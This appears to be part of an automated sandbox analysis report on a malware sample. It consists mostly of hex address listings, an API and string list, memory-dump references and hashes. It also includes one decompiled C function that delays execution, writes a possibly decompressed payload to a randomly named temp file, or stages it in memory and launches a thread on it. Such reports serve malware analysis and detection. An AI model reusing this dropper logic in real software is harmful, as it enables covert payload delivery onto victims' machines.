                                                                                                                                                                                                                                                                                          0x00805b50
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805b52
                                                                                                                                                                                                                                                                                          0x00805b52
                                                                                                                                                                                                                                                                                          0x00805b55
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805b55
                                                                                                                                                                                                                                                                                          0x00805b38
                                                                                                                                                                                                                                                                                          0x00805b38
                                                                                                                                                                                                                                                                                          0x00805b5b
                                                                                                                                                                                                                                                                                          0x00805b5e
                                                                                                                                                                                                                                                                                          0x00805b61
                                                                                                                                                                                                                                                                                          0x00805b64
                                                                                                                                                                                                                                                                                          0x00805b67
                                                                                                                                                                                                                                                                                          0x00805b69
                                                                                                                                                                                                                                                                                          0x00805b70
                                                                                                                                                                                                                                                                                          0x00805b70
                                                                                                                                                                                                                                                                                          0x00805b73
                                                                                                                                                                                                                                                                                          0x00805b73
                                                                                                                                                                                                                                                                                          0x00805b76
                                                                                                                                                                                                                                                                                          0x00805b79
                                                                                                                                                                                                                                                                                          0x00805b79
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805b6b
                                                                                                                                                                                                                                                                                          0x00805b6b
                                                                                                                                                                                                                                                                                          0x00805b6b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805b6b
                                                                                                                                                                                                                                                                                          0x00805b3a
                                                                                                                                                                                                                                                                                          0x00805b3a
                                                                                                                                                                                                                                                                                          0x00805b3f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805b41
                                                                                                                                                                                                                                                                                          0x00805b41
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805b41
                                                                                                                                                                                                                                                                                          0x00805b3f
                                                                                                                                                                                                                                                                                          0x00805b38
                                                                                                                                                                                                                                                                                          0x00805a7c
                                                                                                                                                                                                                                                                                          0x00805a7c
                                                                                                                                                                                                                                                                                          0x00805af4
                                                                                                                                                                                                                                                                                          0x00805af4
                                                                                                                                                                                                                                                                                          0x00805af8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805a7e
                                                                                                                                                                                                                                                                                          0x00805a7e
                                                                                                                                                                                                                                                                                          0x00805a81
                                                                                                                                                                                                                                                                                          0x00805b20
                                                                                                                                                                                                                                                                                          0x00805b20
                                                                                                                                                                                                                                                                                          0x00805b25
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805b27
                                                                                                                                                                                                                                                                                          0x00805b27
                                                                                                                                                                                                                                                                                          0x00805b2a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805b2c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805b2c
                                                                                                                                                                                                                                                                                          0x00805b2a
                                                                                                                                                                                                                                                                                          0x00805a87
                                                                                                                                                                                                                                                                                          0x00805a87
                                                                                                                                                                                                                                                                                          0x00805b02
                                                                                                                                                                                                                                                                                          0x00805b05
                                                                                                                                                                                                                                                                                          0x00805b08
                                                                                                                                                                                                                                                                                          0x00805b0b
                                                                                                                                                                                                                                                                                          0x00805b0e
                                                                                                                                                                                                                                                                                          0x00805b10
                                                                                                                                                                                                                                                                                          0x00805b18
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805b12
                                                                                                                                                                                                                                                                                          0x00805b12
                                                                                                                                                                                                                                                                                          0x00805b12
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805b12
                                                                                                                                                                                                                                                                                          0x00805a89
                                                                                                                                                                                                                                                                                          0x00805a8c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805a8e
                                                                                                                                                                                                                                                                                          0x00805a91
                                                                                                                                                                                                                                                                                          0x00805ab8
                                                                                                                                                                                                                                                                                          0x00805abb
                                                                                                                                                                                                                                                                                          0x00805abe
                                                                                                                                                                                                                                                                                          0x00805ac3
                                                                                                                                                                                                                                                                                          0x00805acd
                                                                                                                                                                                                                                                                                          0x00805acd
                                                                                                                                                                                                                                                                                          0x00805ad0
                                                                                                                                                                                                                                                                                          0x00805ad0
                                                                                                                                                                                                                                                                                          0x00805ad3
                                                                                                                                                                                                                                                                                          0x00805ad6
                                                                                                                                                                                                                                                                                          0x00805ad6
                                                                                                                                                                                                                                                                                          0x00805adb
                                                                                                                                                                                                                                                                                          0x00805adb
                                                                                                                                                                                                                                                                                          0x00805adb
                                                                                                                                                                                                                                                                                          0x00805add
                                                                                                                                                                                                                                                                                          0x00805adf
                                                                                                                                                                                                                                                                                          0x00805adf
                                                                                                                                                                                                                                                                                          0x00805ae1
                                                                                                                                                                                                                                                                                          0x00805ae4
                                                                                                                                                                                                                                                                                          0x00805b83
                                                                                                                                                                                                                                                                                          0x00805b85
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805aea
                                                                                                                                                                                                                                                                                          0x00805aea
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805aea
                                                                                                                                                                                                                                                                                          0x00805ac5
                                                                                                                                                                                                                                                                                          0x00805ac5
                                                                                                                                                                                                                                                                                          0x00805ac5
                                                                                                                                                                                                                                                                                          0x00805b8b
                                                                                                                                                                                                                                                                                          0x00805b8b
                                                                                                                                                                                                                                                                                          0x00805b90
                                                                                                                                                                                                                                                                                          0x00805b92
                                                                                                                                                                                                                                                                                          0x00805b92
                                                                                                                                                                                                                                                                                          0x00805b94
                                                                                                                                                                                                                                                                                          0x00805b99
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805b9f
                                                                                                                                                                                                                                                                                          0x00805ba7
                                                                                                                                                                                                                                                                                          0x00805ba7
                                                                                                                                                                                                                                                                                          0x00805b99
                                                                                                                                                                                                                                                                                          0x00805a93
                                                                                                                                                                                                                                                                                          0x00805a93
                                                                                                                                                                                                                                                                                          0x00805a96
                                                                                                                                                                                                                                                                                          0x00805a96
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805a98
                                                                                                                                                                                                                                                                                          0x00805a98
                                                                                                                                                                                                                                                                                          0x00805a9b
                                                                                                                                                                                                                                                                                          0x00805aa1
                                                                                                                                                                                                                                                                                          0x00805bfa
                                                                                                                                                                                                                                                                                          0x00805bfa
                                                                                                                                                                                                                                                                                          0x00805aa7
                                                                                                                                                                                                                                                                                          0x00805aa7
                                                                                                                                                                                                                                                                                          0x00805aae
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805bdf
                                                                                                                                                                                                                                                                                          0x00805be5
                                                                                                                                                                                                                                                                                          0x00805beb
                                                                                                                                                                                                                                                                                          0x00805bee
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805bac
                                                                                                                                                                                                                                                                                          0x00805bb2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805bb4
                                                                                                                                                                                                                                                                                          0x00805bb4
                                                                                                                                                                                                                                                                                          0x00805bb4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805bf6
                                                                                                                                                                                                                                                                                          0x00805bf6
                                                                                                                                                                                                                                                                                          0x00805bf6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805bba
                                                                                                                                                                                                                                                                                          0x00805bba
                                                                                                                                                                                                                                                                                          0x00805bba
                                                                                                                                                                                                                                                                                          0x00805bba
                                                                                                                                                                                                                                                                                          0x00805bbe
                                                                                                                                                                                                                                                                                          0x00805bbe
                                                                                                                                                                                                                                                                                          0x00805bc1
                                                                                                                                                                                                                                                                                          0x00805bc4
                                                                                                                                                                                                                                                                                          0x00805bc9
                                                                                                                                                                                                                                                                                          0x00805bcb
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805bcd
                                                                                                                                                                                                                                                                                          0x00805bcd
                                                                                                                                                                                                                                                                                          0x00805bd3
                                                                                                                                                                                                                                                                                          0x00805bd5
                                                                                                                                                                                                                                                                                          0x00805bd5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805aae
                                                                                                                                                                                                                                                                                          0x00805aa1
                                                                                                                                                                                                                                                                                          0x00805a96
                                                                                                                                                                                                                                                                                          0x00805a91
                                                                                                                                                                                                                                                                                          0x00805a8c
                                                                                                                                                                                                                                                                                          0x00805a87
                                                                                                                                                                                                                                                                                          0x00805a81
                                                                                                                                                                                                                                                                                          0x00805a7c
                                                                                                                                                                                                                                                                                          0x00805a76
                                                                                                                                                                                                                                                                                          0x00805952
                                                                                                                                                                                                                                                                                          0x00805c0d
                                                                                                                                                                                                                                                                                          0x00805c10
                                                                                                                                                                                                                                                                                          0x00805c12
                                                                                                                                                                                                                                                                                          0x00805c1b
                                                                                                                                                                                                                                                                                          0x00805c1e
                                                                                                                                                                                                                                                                                          0x00805c24
                                                                                                                                                                                                                                                                                          0x00805c27
                                                                                                                                                                                                                                                                                          0x00805c27
                                                                                                                                                                                                                                                                                          0x00805c2a
                                                                                                                                                                                                                                                                                          0x00805c31
                                                                                                                                                                                                                                                                                          0x00805c37
                                                                                                                                                                                                                                                                                          0x00805c39
                                                                                                                                                                                                                                                                                          0x00805c39
                                                                                                                                                                                                                                                                                          0x00805c44
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805c46
                                                                                                                                                                                                                                                                                          0x00805c46
                                                                                                                                                                                                                                                                                          0x00805c4c
                                                                                                                                                                                                                                                                                          0x00805c54
                                                                                                                                                                                                                                                                                          0x00805c59
                                                                                                                                                                                                                                                                                          0x00805c5e
                                                                                                                                                                                                                                                                                          0x00805c5e
                                                                                                                                                                                                                                                                                          0x00805c66
                                                                                                                                                                                                                                                                                          0x00805c6f
                                                                                                                                                                                                                                                                                          0x00805c7c
                                                                                                                                                                                                                                                                                          0x00805c7d
                                                                                                                                                                                                                                                                                          0x00805c82
                                                                                                                                                                                                                                                                                          0x00805c82
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00805c6f
                                                                                                                                                                                                                                                                                          0x00805c85
                                                                                                                                                                                                                                                                                          0x00805c85
                                                                                                                                                                                                                                                                                          0x00805c85
                                                                                                                                                                                                                                                                                          0x00805c88
                                                                                                                                                                                                                                                                                          0x00805c8c
                                                                                                                                                                                                                                                                                          0x00805ca2
                                                                                                                                                                                                                                                                                          0x00805ca8
                                                                                                                                                                                                                                                                                          0x00805caa
                                                                                                                                                                                                                                                                                          0x00805cae
                                                                                                                                                                                                                                                                                          0x00805cae
                                                                                                                                                                                                                                                                                          0x00805cb1
                                                                                                                                                                                                                                                                                          0x00805cb6
                                                                                                                                                                                                                                                                                          0x00805cbb
                                                                                                                                                                                                                                                                                          0x00805cbe
                                                                                                                                                                                                                                                                                          0x00805cc4
                                                                                                                                                                                                                                                                                          0x00805cc6
                                                                                                                                                                                                                                                                                          0x00805cca
                                                                                                                                                                                                                                                                                          0x00805cca
                                                                                                                                                                                                                                                                                          0x00805ccd
                                                                                                                                                                                                                                                                                          0x00805cce
                                                                                                                                                                                                                                                                                          0x00805cd3
                                                                                                                                                                                                                                                                                          0x00805cd3
                                                                                                                                                                                                                                                                                          0x00805cd6
                                                                                                                                                                                                                                                                                          0x00805cdb
                                                                                                                                                                                                                                                                                          0x00805cdb
                                                                                                                                                                                                                                                                                          0x00805ce2
                                                                                                                                                                                                                                                                                          0x00805ce7
                                                                                                                                                                                                                                                                                          0x00805ce9
                                                                                                                                                                                                                                                                                          0x00805ceb
                                                                                                                                                                                                                                                                                          0x00805cf3
                                                                                                                                                                                                                                                                                          0x00805cf5
                                                                                                                                                                                                                                                                                          0x00805cf7
                                                                                                                                                                                                                                                                                          0x00805cfa
                                                                                                                                                                                                                                                                                          0x00805cff
                                                                                                                                                                                                                                                                                          0x00805d04
                                                                                                                                                                                                                                                                                          0x00805cf7
                                                                                                                                                                                                                                                                                          0x00805ce9
                                                                                                                                                                                                                                                                                          0x00805d0a
                                                                                                                                                                                                                                                                                          0x00805d12
                                                                                                                                                                                                                                                                                          0x00805d19
                                                                                                                                                                                                                                                                                          0x00805d26
                                                                                                                                                                                                                                                                                          0x00805c90
                                                                                                                                                                                                                                                                                          0x00805c90
                                                                                                                                                                                                                                                                                          0x00805c96
                                                                                                                                                                                                                                                                                          0x00805c96
                                                                                                                                                                                                                                                                                          0x00805c8c

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(?), ref: 0080594A
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 00805990
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 008059C2
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 008059D5
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 008059EE
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 00805A16
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 00805A64
                                                                                                                                                                                                                                                                                          • OutputDebugStringA.KERNEL32(Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.), ref: 00805BDF
                                                                                                                                                                                                                                                                                          • DebugBreak.KERNEL32 ref: 00805BE5
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(?), ref: 00805C06
                                                                                                                                                                                                                                                                                          • CharNextA.USER32(?), ref: 00805C0E
                                                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 00805C59
                                                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(00000001), ref: 00805C72
                                                                                                                                                                                                                                                                                          • wvsprintfA.USER32(?,00000001,?), ref: 00805CA2
                                                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(-0000000C), ref: 00805CBE
                                                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 00805CFF
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00805D0A
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class., xrefs: 00805BDA
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CharNext$DebugDecrementInterlocked_memmove$BreakOutputStringlstrlenwvsprintf
                                                                                                                                                                                                                                                                                          • String ID: Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.
                                                                                                                                                                                                                                                                                          • API String ID: 3221026881-233888011
                                                                                                                                                                                                                                                                                          • Opcode ID: 6d75c45499e0cd49494f8f8603a9232b726f8b2a75bfc80c86b990c4ff53b8c1
                                                                                                                                                                                                                                                                                          • Instruction ID: 244df4dbbea899f86711abe390166526cf83c3eb98b531ed8a86a07d5671234e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d75c45499e0cd49494f8f8603a9232b726f8b2a75bfc80c86b990c4ff53b8c1
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49D1C171A00A598FDBA0CF28CC986ABBBE5FF45324F188565D886D7291E334ED41CF61
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                          			E04006DA0(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                          				intOrPtr* _v8;
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                                                                                                          				void* _v36;
                                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v40;
                                                                                                                                                                                                                                                                                          				long _v44;
                                                                                                                                                                                                                                                                                          				void* _v48;
                                                                                                                                                                                                                                                                                          				void* _v52;
                                                                                                                                                                                                                                                                                          				void* _v56;
                                                                                                                                                                                                                                                                                          				char _v324;
                                                                                                                                                                                                                                                                                          				void* _v328;
                                                                                                                                                                                                                                                                                          				char _v340;
                                                                                                                                                                                                                                                                                          				char _v604;
                                                                                                                                                                                                                                                                                          				long _v608;
                                                                                                                                                                                                                                                                                          				int _v612;
                                                                                                                                                                                                                                                                                          				long _v616;
                                                                                                                                                                                                                                                                                          				void* _v620;
                                                                                                                                                                                                                                                                                          				long _v624;
                                                                                                                                                                                                                                                                                          				intOrPtr _v628;
                                                                                                                                                                                                                                                                                          				void* _v632;
                                                                                                                                                                                                                                                                                          				intOrPtr _t198;
                                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _t217;
                                                                                                                                                                                                                                                                                          				void* _t223;
                                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _t248;
                                                                                                                                                                                                                                                                                          				void* _t347;
                                                                                                                                                                                                                                                                                          				void* _t349;
                                                                                                                                                                                                                                                                                          				void* _t350;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                                          				if(_v8 == 0) {
                                                                                                                                                                                                                                                                                          					L39:
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				Sleep( *(_v8 + 0x14) * 0x3c * 0x3e8);
                                                                                                                                                                                                                                                                                          				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                                          				_v32 =  *_v8;
                                                                                                                                                                                                                                                                                          				_v28 =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                                                                                                                                                          				_v24 =  *((intOrPtr*)(_v8 + 8));
                                                                                                                                                                                                                                                                                          				_v12 =  *(_v8 + 0x14);
                                                                                                                                                                                                                                                                                          				_v20 =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                                                          				_v16 =  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                                                                                                                                          				if(( *(_v8 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                          					GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
                                                                                                                                                                                                                                                                                          					E04007D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                                                          					E04009730( &_v340, 4);
                                                                                                                                                                                                                                                                                          					_t349 = _t347 + 0x14;
                                                                                                                                                                                                                                                                                          					GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                                                          					_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                                          					if(_v328 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          						_v608 = 0;
                                                                                                                                                                                                                                                                                          						_v612 = 0;
                                                                                                                                                                                                                                                                                          						_v616 =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                                                          						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                          							_v612 = WriteFile(_v328,  *(_v8 + 0x18),  *(_v8 + 0x1c),  &_v608, 0);
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_v624 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                                                          							_v620 = VirtualAlloc(0, _v624, 0x3000, 4);
                                                                                                                                                                                                                                                                                          							if(_v620 != 0) {
                                                                                                                                                                                                                                                                                          								if(E04006260(_v8,  *(_v8 + 0x18),  *(_v8 + 0x1c), _v620, _v624) == _v624) {
                                                                                                                                                                                                                                                                                          									_v612 = WriteFile(_v328, _v620, _v624,  &_v608, 0);
                                                                                                                                                                                                                                                                                          									_v616 = _v624;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								VirtualFree(_v620, 0, 0x8000);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						CloseHandle(_v328);
                                                                                                                                                                                                                                                                                          						if(_v612 != 0 && _v608 == _v616) {
                                                                                                                                                                                                                                                                                          							_t198 = E04001E60( &_v324);
                                                                                                                                                                                                                                                                                          							_t350 = _t349 + 4;
                                                                                                                                                                                                                                                                                          							_v628 = _t198;
                                                                                                                                                                                                                                                                                          							if(_v628 != 0) {
                                                                                                                                                                                                                                                                                          								if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                                          									E040073C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                                          									_t350 = _t350 + 0xc;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                          									E04002510(_v628, 0x400e290);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L38:
                                                                                                                                                                                                                                                                                          					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                                          					goto L39;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v40 = 0;
                                                                                                                                                                                                                                                                                          				_v36 = 0;
                                                                                                                                                                                                                                                                                          				_v44 = 0;
                                                                                                                                                                                                                                                                                          				if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                          					_t217 = E04002070( *(_v8 + 0x18));
                                                                                                                                                                                                                                                                                          					_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                                          					_v40 = _t217;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v44 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                                                          					_v48 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                                          					if(_v48 != 0) {
                                                                                                                                                                                                                                                                                          						if(E04006260( *(_v8 + 0x1c),  *(_v8 + 0x18),  *(_v8 + 0x1c), _v48, _v44) == _v44) {
                                                                                                                                                                                                                                                                                          							_t248 = E04002070(_v48);
                                                                                                                                                                                                                                                                                          							_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                                          							_v40 = _t248;
                                                                                                                                                                                                                                                                                          							if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                          								_v36 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                                          								E04007B70(_v36, _v48, _v44);
                                                                                                                                                                                                                                                                                          								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						VirtualFree(_v48, 0, 0x8000);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(_v40 == 0) {
                                                                                                                                                                                                                                                                                          					L22:
                                                                                                                                                                                                                                                                                          					goto L38;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                                          						E040073C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                                          						_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                                          						_t223 = E040097A0(0x10);
                                                                                                                                                                                                                                                                                          						_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                                          						_v632 = _t223;
                                                                                                                                                                                                                                                                                          						_v52 = _v632;
                                                                                                                                                                                                                                                                                          						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                          							 *_v52 = VirtualAlloc(0,  *(_v8 + 0x1c), 0x3000, 4);
                                                                                                                                                                                                                                                                                          							if( *_v52 != 0) {
                                                                                                                                                                                                                                                                                          								E04007B70( *_v52,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                                          								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                                          								 *(_v52 + 4) =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *_v52 = _v36;
                                                                                                                                                                                                                                                                                          							 *(_v52 + 4) = _v44;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if( *_v52 != 0) {
                                                                                                                                                                                                                                                                                          							 *(_v52 + 8) =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_v52 + 0xc)) = _v40;
                                                                                                                                                                                                                                                                                          							_v56 = CreateThread(0, 0, E040077B0, _v52, 0, 0);
                                                                                                                                                                                                                                                                                          							CloseHandle(_v56);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                          						E04002510(_v40, 0x400e290);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L22;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}


































                                                                                                                                                                                                                                                                                          0x04006dac
                                                                                                                                                                                                                                                                                          0x04006db3
                                                                                                                                                                                                                                                                                          0x0400723f
                                                                                                                                                                                                                                                                                          0x04007244
                                                                                                                                                                                                                                                                                          0x04007244
                                                                                                                                                                                                                                                                                          0x04006dc9
                                                                                                                                                                                                                                                                                          0x04006dd1
                                                                                                                                                                                                                                                                                          0x04006ddc
                                                                                                                                                                                                                                                                                          0x04006de5
                                                                                                                                                                                                                                                                                          0x04006dee
                                                                                                                                                                                                                                                                                          0x04006df7
                                                                                                                                                                                                                                                                                          0x04006e00
                                                                                                                                                                                                                                                                                          0x04006e09
                                                                                                                                                                                                                                                                                          0x04006e15
                                                                                                                                                                                                                                                                                          0x04007028
                                                                                                                                                                                                                                                                                          0x04007039
                                                                                                                                                                                                                                                                                          0x0400704a
                                                                                                                                                                                                                                                                                          0x0400704f
                                                                                                                                                                                                                                                                                          0x04007077
                                                                                                                                                                                                                                                                                          0x04007099
                                                                                                                                                                                                                                                                                          0x040070a6
                                                                                                                                                                                                                                                                                          0x040070ac
                                                                                                                                                                                                                                                                                          0x040070b6
                                                                                                                                                                                                                                                                                          0x040070c6
                                                                                                                                                                                                                                                                                          0x040070d5
                                                                                                                                                                                                                                                                                          0x040071af
                                                                                                                                                                                                                                                                                          0x040070db
                                                                                                                                                                                                                                                                                          0x040070eb
                                                                                                                                                                                                                                                                                          0x04007107
                                                                                                                                                                                                                                                                                          0x04007114
                                                                                                                                                                                                                                                                                          0x0400713d
                                                                                                                                                                                                                                                                                          0x04007163
                                                                                                                                                                                                                                                                                          0x0400716f
                                                                                                                                                                                                                                                                                          0x0400716f
                                                                                                                                                                                                                                                                                          0x04007183
                                                                                                                                                                                                                                                                                          0x04007183
                                                                                                                                                                                                                                                                                          0x04007189
                                                                                                                                                                                                                                                                                          0x040071bc
                                                                                                                                                                                                                                                                                          0x040071c9
